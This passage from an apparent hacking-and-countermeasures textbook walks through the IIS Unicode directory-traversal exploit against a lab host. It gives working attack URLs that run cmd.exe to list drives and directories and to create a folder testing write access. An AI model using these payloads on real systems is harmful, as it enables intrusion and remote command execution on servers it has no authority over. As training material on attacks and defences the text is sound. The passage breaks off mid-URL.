Electronic Books

In
this example, the initial discovery will show the contents of the C: drive.
174
Practical Hacking Techniques and Countermeasures
To execute, right-click on a script and left-click on Copy String.
Open Internet Explorer and paste the line in the address bar. Press the
Enter key. The directory listing of the target??™s C: drive will appear.
The line that should be in the address bar is:
http://172.16.1.40/scripts/..%c0%af../winnt/system32/
cmd.exe?/c+dir+c:\
From this point the entire hard drive can be viewed a directory at a time
by editing the script in the address bar.
*Note: At this point an attacker may choose to see exactly what is installed on the
target. He or she may check to see if the target has a firewall or antivirus
installed, and whether there are any logs, proprietary software, sensitive
documents, etc.
Scanning
175
To list the contents of the Program Files directory, edit the address bar to
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c
0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1
At this point an attacker may see if he or she has write access to the target.
This is done by attempting to send a create directory command within the script:
http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c
0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked
176
Practical Hacking Techniques and Countermeasures
The following screen appears:
On the address bar enter the same script originally obtained from the TCS
CGI Scanner:
http://172.


Pages:
68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92